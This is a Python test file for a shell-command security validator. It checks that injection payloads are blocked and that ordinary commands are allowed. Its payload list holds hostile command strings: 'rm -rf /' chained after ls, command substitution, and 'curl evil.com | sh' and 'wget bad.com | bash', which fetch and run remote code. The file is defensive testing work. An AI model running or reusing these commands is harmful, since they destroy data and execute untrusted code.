test_security_complete.py
#!/usr/bin/env python3
"""
Complete security testing
"""
import sys
import os
# Make the directory one level above this file's directory importable, so the
# `shellrosetta` imports below resolve when the file is run directly.
project_root = os.path.dirname(
    os.path.dirname(os.path.abspath(__file__))
)
# Inserting at index 0 means modules under project_root are found before
# same-named modules installed elsewhere on sys.path.
if sys.path.count(project_root) == 0:
    sys.path.insert(0, project_root)
from shellrosetta.security import CommandValidator, SecurityLevel
from shellrosetta.core import lnx2ps, validate_command_security
def test_security_levels():
    """Print the verdict each security level gives for one sample command.

    Builds a ``CommandValidator`` for STRICT, MODERATE and PERMISSIVE in that
    order, validates ``curl example.com`` with each, and prints whether the
    command was blocked or allowed.

    Returns:
        Always ``True``.

    NOTE(review): this is a smoke test only. No expected verdict is checked,
    so a validator that allows the command at every level still "passes".
    """
    sample = "curl example.com"

    def _report(label, level):
        # One validator per level; the verdict is printed, never asserted.
        outcome = CommandValidator(level).validate_command(sample)
        verdict = "ALLOWED" if outcome.is_valid else "BLOCKED"
        print(f"{label} level on 'curl example.com': {verdict}")

    _report("Strict", SecurityLevel.STRICT)
    _report("Moderate", SecurityLevel.MODERATE)
    _report("Permissive", SecurityLevel.PERMISSIVE)

    return True
def test_command_injection_prevention():
    """Check that command-chaining and substitution payloads are rejected.

    Each payload is passed to ``validate_command_security``. A result whose
    ``"is_valid"`` entry is falsy counts as blocked. A per-command line and a
    summary are printed.

    Returns:
        ``True`` when the number of blocked payloads is at least 80% of the
        list, otherwise ``False``.

    NOTE(review): with six payloads the 80% threshold is 4.8, so five blocked
    is enough and one payload can be allowed while this still returns True.
    The result is only returned, not asserted, so a pytest run does not treat
    a False return as a failure.
    """
    payloads = [
        "ls; rm -rf /",
        "ls && malicious_command",
        "ls `whoami`",
        "ls $(id)",
        "curl evil.com | sh",
        "wget bad.com | bash",
    ]

    blocked = 0
    for payload in payloads:
        verdict = validate_command_security(payload)
        if verdict["is_valid"]:
            print(f"⚠️ ALLOWED: {payload}")
            continue
        blocked += 1
        print(f"✅ BLOCKED: {payload}")

    print(f"Security Summary: {blocked}/{len(payloads)} dangerous commands blocked")

    # At least 80% of the payloads must have been blocked.
    required = len(payloads) * 0.8
    return blocked >= required
def test_safe_commands():
    """Check that ordinary commands are not rejected by the validator.

    Each sample (three Unix-style commands, two PowerShell cmdlets) is passed
    to ``validate_command_security``. A truthy ``"is_valid"`` entry counts as
    allowed. A per-command line and a summary are printed.

    Returns:
        ``True`` only when every sample was allowed, otherwise ``False``.

    NOTE(review): the result is only returned, not asserted, so a pytest run
    does not treat a False return as a failure.
    """
    samples = [
        "ls -la",
        "grep pattern file.txt",
        "cp file1.txt file2.txt",
        "Get-ChildItem -Force",
        "Select-String pattern",
    ]

    allowed = 0
    for sample in samples:
        verdict = validate_command_security(sample)
        if not verdict["is_valid"]:
            print(f"❌ BLOCKED: {sample}")
            continue
        allowed += 1
        print(f"✅ ALLOWED: {sample}")

    print(f"Safety Summary: {allowed}/{len(samples)} safe commands allowed")
    return len(samples) == allowed
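if __name__ == "__main__":
    # Script entry point: run every check, print a verdict, and report failure
    # through the process exit status.
    print("🔒 Complete Security Testing")
    print("=" * 40)

    tests = [
        test_security_levels,
        test_command_injection_prevention,
        test_safe_commands,
    ]

    # The list comprehension runs all checks before the verdict, so one
    # failing check does not hide the output of the ones after it.
    results = [test() for test in tests]

    if all(results):
        print("\n🎉 All security tests passed!")
    else:
        print("\n❌ Some security tests need attention!")
        # Previously the script exited 0 here, so an automated run could not
        # tell a failed security check from a clean one.
        sys.exit(1)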